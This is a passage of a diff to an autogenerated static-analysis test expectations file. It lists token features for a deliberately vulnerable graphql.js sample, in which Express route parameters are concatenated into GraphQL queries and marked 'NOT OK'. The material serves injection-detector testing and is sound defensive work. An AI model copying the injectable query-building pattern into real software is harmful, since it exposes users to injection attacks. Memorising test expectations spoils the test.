repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:46:12:47 | id | stringConcatenatedWith | '\n query {\n repository(owner: "github", name: "' -endpoint- '") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n ' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | enclosingFunctionBody | req res id req params id response kit graphql \n query {\n repository(owner: "github", name: " id ") {\n object(expression: "master:foo") {\n ... on Blob {\n text\n }\n }\n }\n }\n | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:12:49:20:4 | ") {\\n ... }\\n | stringConcatenatedWith | '\n query {\n repository(owner: "github", name: "' + id -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:1:23:62 | import ... aphql"; | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:1:23:62 | import ... aphql"; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:1:23:62 | import ... aphql"; | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:10:23:16 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:19:23:35 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:44:23:61 | "@octokit/graphql" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:44:23:61 | "@octokit/graphql" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:23:44:23:61 | "@octokit/graphql" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:25:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:1:34:2 | exceptional return of app.get ... T OK\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:5:25:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:5:25:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:5:25:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | calleeImports | express | @@ -192,6 +1405,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:9:25:20 | '/user/:id/' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | graphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | request | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | this | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | withCustomRequest | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | withCustomRequest | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:25:22 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | exceptional return of anonymous function | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | calleeImports | express | @@ -199,6 +1442,91 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | return of anonymous function | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:23:34:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:32:25:34 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:37:25:39 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:37:25:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:37:25:39 | res | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:37:25:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:25:37:25:39 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:12 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:12 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:12 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:12 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:12 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id = req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id = req.params.id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:11:26:28 | id = req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:18 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:18 | req | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:18 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:25 | req.params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:25 | req.params | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:25 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:25 | req.params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:28 | req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:28 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:28 | req.params.id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:28 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:16:26:28 | req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:20:26:25 | params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:20:26:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:20:26:25 | params | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:20:26:25 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:20:26:25 | params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:27:26:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:27:26:28 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:27:26:28 | id | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:27:26:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:26:27:26:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:18 | response | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:18 | response | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:18 | response | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:18 | response | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:18 | response | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:41 | respons ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:41 | respons ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:41 | respons ... ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:41 | respons ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:11:27:41 | respons ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:28 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:28 | graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:28 | graphql | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:28 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:28 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | exceptional return of graphql(`foo ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | exceptional return of graphql(`foo ${id}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | exceptional return of graphql(`foo ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | exceptional return of graphql(`foo ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | exceptional return of graphql(`foo ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | graphql(`foo ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | graphql(`foo ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | graphql(`foo ${id}`) | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | graphql(`foo ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:22:27:41 | graphql(`foo ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | CalleeFlexibleAccessPath | graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | calleeImports | @octokit/graphql | @@ -207,6 +1535,48 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:30:27:40 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | enclosingFunctionBody | req res id req params id response graphql foo id myGraphql withCustomRequest request response myGraphql foo id withDefaults graphql defaults withDefaults foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:27:31:27:34 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| 